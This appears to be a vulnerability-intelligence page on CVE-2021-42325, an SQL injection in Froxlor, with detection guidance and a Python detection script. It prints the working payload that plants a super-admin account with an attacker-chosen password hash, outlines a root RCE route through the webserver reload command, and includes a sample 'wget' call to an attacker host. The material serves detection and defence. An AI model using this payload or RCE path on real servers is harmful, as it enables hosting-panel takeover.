CVE-2021-42325
Published 2021-10-12
Priority: P2 (score 70) · CVSS 3.1: 9.8 critical · AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Exploit: public exploit available
EPSS: 11.81% (95.6th percentile)
Froxlor through 0.10.29.1 allows SQL injection in Database/Manager/DbManagerMySQL.php via a custom DB name.
Affected (2 ranges; both resolve to every release before 0.10.30)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| froxlor | froxlor | < 0.10.30 | 0.10.30 |
| froxlor | froxlor | >= 0 < 0.10.30 | 0.10.30 |
Detection & IOCs (extracted from sources)

IOC (command): the SQL payload submitted as the custom DB name in the public exploit. The leading backtick closes the quoted identifier in Froxlor's CREATE DATABASE statement, `;` starts a second statement that inserts a row into `panel_admins`, and the trailing `--` comments out the remainder of the original query:

    `;insert into panel_admins (loginname,password,customers_see_all,domains_see_all,caneditphpsettings,change_serversettings) values ('x','$5$ccd0bcdd9ab970b1$Hx/a0W8QHwTisNoa1lYCY4s3goJeh.YCQ3hWqH1ZUr8',1,1,1,1);--

The password column receives a SHA-256 crypt hash (`$5$` prefix) supplied by the attacker, so the planted account's credentials are entirely attacker-controlled, and all four admin flags are set to 1.

Detection:
- Monitor POST requests to /customer_mysql.php containing SQL metacharacters (backtick, semicolon, INSERT, --) in the `custom_suffix` parameter, which is the injection point for CVE-2021-42325.
- Alert on POST bodies containing URL-encoded injection patterns targeting `custom_suffix`, specifically sequences like `%60%3B` (backtick+semicolon) followed by `insert+into+panel_admins`. Decode before matching, since the same payload can arrive literal or percent-encoded.
- Detect unexpected new rows in the `panel_admins` table, especially accounts with `customers_see_all=1`, `domains_see_all=1`, `caneditphpsettings=1` and `change_serversettings=1` created outside normal admin workflows.
- Monitor the Froxlor 'Webserver reload command' field (System Settings > Webserver settings) for modifications by non-baseline admin accounts; post-exploitation RCE is achieved by injecting a command there.
- Watch for `wget` or `php` processes spawned from the Froxlor cron job (which runs as root), particularly ones writing or executing files such as /runme.php.
- The exploit requires the 'custom DB name' feature to be manually enabled (available from 0.10.28 onward); audit Froxlor configurations where this feature is active as a risk indicator.

Scope and caveats:
- The SQL injection via `custom_suffix` is only exploitable when the custom database name feature has been manually enabled by the administrator; default installations are not vulnerable.
- Exploitation requires an authenticated customer account; unauthenticated attackers cannot reach the vulnerable endpoint.
- The RCE stage via 'Webserver reload command' goes through Froxlor's `safe_exec` function, which rejects the characters ; | & > < ` $ ~ ? in the command; a payload must avoid all of them to succeed (so, for example, a URL with a query string cannot be passed to `wget`).
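The three detection ideas above (request-side matching on `custom_suffix`, a `panel_admins` audit, and the `safe_exec` character filter) as one runnable check. This is an added example, not Froxlor code and not a published rule; it assumes request bodies are available from a WAF or request-logging layer as (method, path, raw body) tuples and that `panel_admins` rows can be dumped as dicts. All sample requests, logins and commands are constructed for the demonstration.

```python
"""Detection logic for the CVE-2021-42325 indicators listed above.

Added example, not Froxlor code or a published rule. Assumes request bodies are
available from a WAF or request-logging layer as (method, path, raw_body)
tuples, and that panel_admins rows can be dumped as dicts; all sample data
below is constructed, not captured traffic.
"""
import re
from typing import Optional
from urllib.parse import parse_qs

# Metacharacters and keywords from the detection notes: backtick, semicolon,
# comment marker, INSERT INTO and the target table name.
SQL_META = re.compile(r"[`;]|--|\binsert\s+into\b|\bpanel_admins\b", re.IGNORECASE)

# Characters Froxlor's safe_exec() rejects (per the caveat above); a
# 'Webserver reload command' payload containing any of them will not run.
SAFE_EXEC_FORBIDDEN = frozenset(";|&><`$~?")

# Super-admin flags the exploit sets to 1 on the inserted row.
SUPER_ADMIN_FLAGS = ("customers_see_all", "domains_see_all",
                     "caneditphpsettings", "change_serversettings")


def suspicious_custom_suffix(method: str, path: str, body: str) -> Optional[dict]:
    """Return a finding if a POST to customer_mysql.php carries SQL metacharacters
    in custom_suffix; None otherwise. Matching is done on the decoded value, so
    "%60%3Binsert+into" and a literal "`;insert into" are treated alike."""
    if method.upper() != "POST" or not path.endswith("/customer_mysql.php"):
        return None
    params = parse_qs(body, keep_blank_values=True)   # percent-decodes, '+' -> space
    for value in params.get("custom_suffix", []):
        hit = SQL_META.search(value)
        if hit:
            return {"path": path, "param": "custom_suffix",
                    "value": value, "matched": hit.group(0)}
    return None


def unexpected_super_admins(rows, baseline_logins):
    """Logins of panel_admins rows that hold all four super-admin flags and are
    not in the known-good baseline (i.e. the backdoor account the payload plants)."""
    return [r["loginname"] for r in rows
            if r["loginname"] not in baseline_logins
            and all(r.get(flag) == 1 for flag in SUPER_ADMIN_FLAGS)]


def passes_safe_exec(command: str) -> bool:
    """True if the command contains none of safe_exec()'s forbidden characters,
    i.e. it would be executed by the root cron job if planted as reload command."""
    return not (set(command) & SAFE_EXEC_FORBIDDEN)


# Constructed sample data (hypothetical; not real traffic or a real database).
SAMPLE_REQUESTS = [
    ("POST", "/customer_mysql.php",
     "page=mysqls&action=add&custom_suffix=shop&description=webshop"),
    ("POST", "/customer_mysql.php",
     "page=mysqls&action=add&custom_suffix=%60%3Binsert+into+panel_admins"
     "+%28loginname%29+values+%28%27x%27%29%3B--&description=x"),
    ("GET", "/customer_mysql.php", ""),
    ("POST", "/customer_index.php", "custom_suffix=%60%3B"),   # wrong endpoint
]

SAMPLE_PANEL_ADMINS = [
    {"loginname": "admin", "customers_see_all": 1, "domains_see_all": 1,
     "caneditphpsettings": 1, "change_serversettings": 1},
    {"loginname": "x", "customers_see_all": 1, "domains_see_all": 1,
     "caneditphpsettings": 1, "change_serversettings": 1},       # planted by the payload
    {"loginname": "reseller1", "customers_see_all": 0, "domains_see_all": 1,
     "caneditphpsettings": 0, "change_serversettings": 0},
]


def scan_samples():
    """Run the request-side and database-side checks over the constructed samples."""
    request_hits = [f for f in (suspicious_custom_suffix(*r) for r in SAMPLE_REQUESTS) if f]
    rogue_admins = unexpected_super_admins(SAMPLE_PANEL_ADMINS, {"admin"})
    return request_hits, rogue_admins


if __name__ == "__main__":
    hits, rogue = scan_samples()
    for h in hits:
        print(f"ALERT {h['path']} {h['param']}={h['value']!r} (matched {h['matched']!r})")
    print("unexpected super-admins:", rogue)
    for cmd in ("php /runme.php", "wget http://attacker.example/runme.php?x=1"):
        print(f"{cmd!r} passes safe_exec filter: {passes_safe_exec(cmd)}")
```

The request check deliberately decodes with `parse_qs` before matching so the encoded form from the second detection note and a literal payload hit the same rule; the `panel_admins` check needs a baseline of known admin logins, which is the part a real deployment has to maintain.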
CVSS provenance

- NVD, CVSS v3.1: 9.8 CRITICAL (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
- NVD, CVSS v2.0: 7.5 HIGH (AV:N/AC:L/Au:N/C:P/I:P/A:P)

NVD scores PR:N (no privileges required), whereas the exploit analysis above needs an authenticated customer account and a non-default setting (custom DB names enabled). When prioritising, treat 9.8 as an upper bound and check those two preconditions on each Froxlor instance first.
OSV · 2022-05-24: CVE-2021-42325 [CRITICAL] Froxlor SQL injection vulnerability
GHSA · 2022-05-24: CVE-2021-42325 [CRITICAL] CWE-89 Froxlor SQL injection vulnerability
Both advisories carry the same description as NVD: Froxlor through 0.10.29.1 allows SQL injection in `Database/Manager/DbManagerMySQL.php` via a custom DB name.
No detection rules found.
No writeups or analysis indexed.
References:
- http://packetstormsecurity.com/files/164800/Froxlor-0.10.29.1-SQL-Injection.html
- https://github.com/Froxlor/Froxlor/commit/eb592340b022298f62a0a3e8450dbfbe29585782 (fix commit)
- https://www.exploit-db.com/exploits/50502